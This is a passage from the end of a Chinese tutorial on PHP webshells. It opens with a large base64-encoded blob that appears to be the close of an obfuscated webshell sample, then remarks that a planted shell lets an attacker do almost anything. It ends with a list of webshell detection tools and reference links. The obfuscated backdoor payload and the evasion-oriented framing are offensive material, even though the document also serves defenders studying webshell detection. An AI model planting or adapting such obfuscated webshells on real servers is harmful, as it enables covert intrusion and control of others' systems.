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'x29x29x29x3B",".");
?>

9、加密

这里不再介绍了

五、种马之后

由于被入侵过，对之前的文件有过研究，截几张图大家看看

 

基本上就可以为所欲为了 

六、检测工具

编号	名称	参考链接
1	网站安全狗网马查杀	http://download.safedog.cn/download/software/safedogwzApache.exe
2	D盾 Web查杀	http://www.d99net.net/down/WebShellKill_V2.0.9.zip
3	深信服WebShellKillerTool	http://edr.sangfor.com.cn/tool/WebShellKillerTool.zip
4	BugScaner killwebshell	http://tools.bugscaner.com/killwebshell/
5	河马专业版查杀Webshell	http://n.shellpub.com/
6	OpenRASPWEBDIR+检测引擎	https://scanner.baidu.com
7	深度学习模型检测PHP Webshell	http://webshell.cdxy.me/

上面工具非常好用，95%的基本都能检测出来，知道webshell是什么样的，就可以根据相应的特征找出来

参考文档

http://php.net/manual

https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html

https://joychou.org/web/webshell.html

http://www.likesec.com/2017/12/08/webshell/

http://blog.safedog.cn/?p=68

http://www.freebuf.com/articles/web/155891.html

http://www.freebuf.com/articles/web/9396.html

https://blog.csdn.net/xysoul/article/details/49791993

https://cloud.tencent.com/developer/article/1097506

http://www.91ri.org/12824.html

http://www.3years.cc/index.php/archives/18/

http://www.cnblogs.com/LittleHann/p/3522990.html

https://habrahabr.ru/post/215139/

https://stackoverflow.com/questions/14674834/php-convert-string-to-hex-and-hex-to-string

https://xz.aliyun.com/t/2335